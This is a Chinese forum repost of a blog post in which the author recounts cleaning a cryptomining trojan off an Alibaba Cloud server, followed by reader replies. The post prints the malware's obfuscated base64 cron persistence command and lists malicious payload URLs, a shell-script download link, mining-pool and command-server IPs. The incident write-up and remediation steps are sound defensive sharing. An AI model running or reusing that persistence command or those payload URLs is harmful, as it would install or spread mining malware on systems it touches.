个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施

shaun.sheng

原文链接：https://blog.csdn.net/chinassj/article/details/105392445
以前玩过腾讯，阿里，华为的免费服务器，都是又卡又慢，身为22世纪祖国的花朵，经过知识付费的熏陶，我义无反顾的终止了我的白嫖行为，然而努力让自己变得更好的路上总是有各种坑。。。。
服务器背景：
​
操作环境背景：
操作系统：Windows 10
操作工具：xshell（Free for Home/school）
故事背景：
拿到服务器后，自己创建了一个普通用户：shaun ；密码：123456   
（我承认我懒，所以设了这个连号密码，但这个该死的挖矿程序把我心态搞炸了，他要是不搞我的程序，让我还能玩，我都懒得搞他，但是我搭建的程序都GG了，所以不得不花费一天时间来记录一下，菜鸡的垂死挣扎全过程）
一个多月都是用普通用户在瞎捣鼓，有一天习惯的ssh登录，然而不幸的事情发生了，一直登陆不上。（后来证明还有Apache Solr Velocity模板远程命令执行漏洞）（感谢大佬 @officektv 的纠错）

（当时没截图，以下图片都是后来的）
​解决方法：
根据菜鸡生存手册第一条：百度一下，你就知道。
​
虽然没解决但是提供了点思路，使用root成功登陆服务器，
发现些许猫腻
​​

甜蜜的！这台服务器上什么都没有运行，跑这些干啥玩意捏，经过简单的kill 命令，发现杀不完。
​
看了一下定时任务果然：（当时没截图，以下图片都是后来的）
​

定时任务的脚本：
/bin/sh -c echo -n "KCB3aGlsZSA6IDsgZG8gc2xlZXAgNSA7IGlmICEga2lsbCAtMCA5MjI2ID4vZGV2L251bGwgMj4mMSA7IHRoZW4gL2hvbWUvc2hhdW4vYnZ4Y3Z3ID4vZGV2L251bGwgMj4mMSA7IGZpIDsgZG9uZSApICYgcGlkPSQhIDsgKHNsZWVwIDEwICYmIGtpbGwgLTkgJHBpZCkgJg==" | base64 -d | sh >/dev/null 2>&1
​

while 循环！这是每一个小时不留痕迹的循环搞事情呀。。。

此时已经知道中了挖矿木马病毒，甜蜜的，这种级别的已经不是我这种菜鸡可以解决的了，登录阿里云官网看了一下，
​

​
因为穷所以没有快照，有钱的小伙伴一定要搞个快照，但是也要小心，别把病毒也快照进去了。
最偷懒的解决发法：重装系统(想要根除病毒太难了，初始化一下就完事了)，无非就是数据的问题，不怕直接重装；
阿里云官方教程：https://help.aliyun.com/document_detail/25449.html
初始化30分钟都不到；重新安装java，mysql，应用程序，恢复数据等，最重要的是重新设置了超复杂密码，以上问题解决一共花费清明节三天时间，反正受疫情影响，也出不去，只能这样安慰自己。

shaun：挖矿木马程序，你没想到吧，解决你只要几分钟，格式化一下就好了
​

以上全部内容，此致敬礼! （大佬们看到这里就可以了，这也是官方推荐的解决方法，下面的是菜鸡的左右互搏苦苦挣扎。）



再一天后，又是习惯的ssh登录，还是原来的配方，还是熟悉的味道，加夕。。。。（跑题了）
​解决方法：
根据菜鸡生存手册第一条：百度一下，你京
​
挖矿木马：你没想到吧，我又回来了！
shaun：我去年买了个表！
人生不如意，十有八九。本以为逃过一劫，
​
好吧，这辈子劳碌的命。。。
1.root登录
2.查看指定用户是否有定时任务：
crontab -l -u shaun
3.删除此用户的定时任务：
crontab -r -u  shaun
4.查看此用户的定时任务文件：
cd /var/spool/cron/
5.通过 ll  找到 shaun的定时任务文件，直接 rm -rf shaun
6.因为神秘力量，所以会不停的创建shaun 的定时任务，你删了，过会又出来了。所以此时我们要走病毒的路，让他无路可走。    根据Linux下一切都是文件，一个目录归根到底还是一个文件，所以同一目录内文件和目录不能同名！
    个人操作：所以创建一个目录 名为shaun，让他没有办法创建名为shaun的定时任务文件。​
7.在次查看指定用户是否有定时任务：
crontab -l -u shaun
8.在来一套七伤拳打发，检测cron定时服务是否自启用：
systemctl is-enabled crond.service 结果展示如下：
enable表示已启用自启动
disable标识未启用自启动
9.如果已经启用，关闭cron自启动:
systemctl disable crond.service

10.停止cron服务[命令没有提示]:
systemctl stop crond.service

11.查看cron服务的启动状态:
systemctl status crond.service[只有cron的状态是active  running的，才表示cron服务是启动的]
12.至此定时任务，应该停止了。可以查看一下有哪些正在运行的进程，kill掉不正常的就OK了。
ps -ef |grep shaun

13.修改 shaun 用户的登录密码
passwd shaun

14.重新试了一下shaun 登录，可以登陆了。灰常开心，终于不要初始化了。

​

应该找售后解决问题，我不能抢人家饭碗呀。

​


总结：养成备份的好习惯，最好使用快照备份，就是注意别把病毒也备份进去。
          像我一样如果就是想玩玩，可以自己先和病毒玩玩，自认为技术过关，病毒查杀干干净净了，可以不用初始化。

                  如果和我一样是小白那最后还是初始化（格式化），此方法最麻烦的就是如何恢复数据了。

在此感谢这三个网站提供的思路：
​

https://www.w3xue.com/exp/article/20199/53730.html

https://zhuanlan.zhihu.com/p/85731835

https://www.cnblogs.com/hack404/p/11464890.html




Tips:要想生活过得去，所有检查都得绿。
​




1.贴出恶意下载源（我已经把这个ip，不论入站还是出站都拒绝访问了）

      （千万别点，会自动下载一个东东到你的电脑，我没研究）：http://82.146.36.205/sites/default/files/maps   
     ​

2.贴出矿池IP：157.245.228.211 ；矿池端口：80

​


3.web攻击， Apache Solr Velocity模板远程命令执行漏洞（感谢大佬 @officektv 的纠错）
请求时间：2020-04-07 18:07:26
攻击者IP：194.99.104.130
​
暂时修改建议：​ 限制互联网用户对solr admin的访问!​​​​​​​
​​​​
其他 恶意IP很多，不管是不是肉鸡，我是宁错杀不放过。
高危链接：本人在此声明，仅供学习参考，有任何问题，与本文，本人无关。
http://35.168.165.151/sites/default/files/maps

http://82.146.36.205/sites/default/files/maps

攻击者IP：194.99.104.130

矿池IP：157.245.228.211

矿池IP：157.245.149.66

中控IP：134.209.81.199

中控IP：157.245.149.66

攻击者IP：212.8.247.179

URL链接：http://217.12.221.244/s.sh


最后结束语：

引用毛主席的话：与天斗，与地斗，与人斗，其乐无穷！

shaun.sheng

king82 发表于 2020-4-9 13:39
身为22世纪祖国的花朵，经过知识付费的熏陶，我义无反顾的终止了我的白嫖行为

看到这，忍不住笑出了声。 ...

哈哈哈，主要是腾讯阿里华为亚马逊，免费的一个月都玩完了，终于还是走上为国家贡献GDP的道路，向着共同富裕更近一步了。

shaun.sheng

寂静的白昼 发表于 2020-4-9 12:22
怎么查看是否被挖矿病毒入侵，因为服务器里没什么重要的东西所以我一般都是初始化

去每个平台的，服务器管理页面，一般都会有，危险提示报警。
或者直接Linux 里面 top 一下，就和任务管理器一样，可以看到cpu的

Bad丶Boy

最后解决了没  

shaun.sheng

Bad丶Boy 发表于 2020-4-9 11:56
最后解决了没

解决了。只不过没有初始化。

孤丶宇

感谢楼主！ 呜呜   (╯‵□′)╯︵❤

jswxyl

楼主厉害了，威武

猪头是笨死的

我认为木马里面找到别人的钱包地址，可以查出挂马人的信息，有的高级牛，能把别人钱包的钱黑了！😀

CNLibrary

下面的图都看不到，而且原帖地址已经失效了

兔斯基的眼泪

斗争的过程中自己的技术也见长了，美滋滋

谦月

发现一个时间穿越者~

执念123

阿里云整天提示我几十个漏洞